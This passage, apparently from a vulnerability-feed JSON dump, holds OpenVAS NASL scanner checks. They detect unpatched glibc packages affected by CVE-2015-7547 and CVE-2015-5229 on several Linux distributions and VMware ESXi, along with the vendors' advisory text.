\"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310882399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882399", "type": "openvas", "title": "CentOS Update for glibc CESA-2016:0176 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2016:0176 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882399\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:27:38 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for glibc CESA-2016:0176 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the name service cache daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n * The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of 'madvise' system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the 'mallopt' function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n * On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error 'monstartup: out of memory'.\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0176\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-February/021672.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:58:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-03-11T00:00:00", "id": "OPENVAS:1361412562310120650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120650", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-660)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120650\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-11 07:09:13 +0200 (Fri, 11 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-660)\");\n script_tag(name:\"insight\", value:\"It was discovered that the calloc implementation in glibc could return memory areas which contain non-zero bytes. This could result in unexpected application behavior such as hangs or crashes.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-660.html\");\n script_cve_id(\"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "Oracle Linux Local Security Checks ELSA-2016-0175", "modified": "2019-03-14T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310122881", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122881", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0175.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122881\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:22 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0175\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0175 - glibc security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0175\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0175.html\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310807299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807299", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2016-0", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807299\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 06:22:33 +0100 (Thu, 18 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for glibc FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/177412.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.22~9.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310882391", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882391", "type": "openvas", "title": "CentOS Update for glibc CESA-2016:0175 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2016:0175 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882391\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:26:54 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for glibc CESA-2016:0175 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the Name Server Caching Daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n * The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with 'dlopen: cannot load any more object with static TLS'\nshould now start up correctly. (BZ#1291270)\n\n * A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0175\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-February/021668.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-19T16:04:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "VMware product updates address a critical glibc security vulnerability.", "modified": "2019-12-18T00:00:00", "published": "2016-02-24T00:00:00", "id": "OPENVAS:1361412562310105560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105560", "type": "openvas", "title": "VMware ESXi updates address a critical glibc security vulnerability (VMSA-2016-0002)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0002: VMware product updates address a critical glibc security vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105560\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi updates address a critical glibc security vulnerability (VMSA-2016-0002)\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"insight\", value:\"The glibc library has been updated in multiple products to resolve a\n stack buffer overflow present in the glibc getaddrinfo function.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware product updates address a critical glibc security vulnerability.\");\n\n script_tag(name:\"affected\", value:\"ESXi 6.0 without patch ESXi600-201602401-SG\n\n ESXi 5.5 without patch ESXi550-201602401-SG\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-24 15:23:40 +0100 (Wed, 24 Feb 2016)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"6.0.0\", \"VIB:esx-base:6.0.0-1.29.3568940\",\n \"5.5.0\", \"VIB:esx-base:5.5.0-3.84.3568722\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": 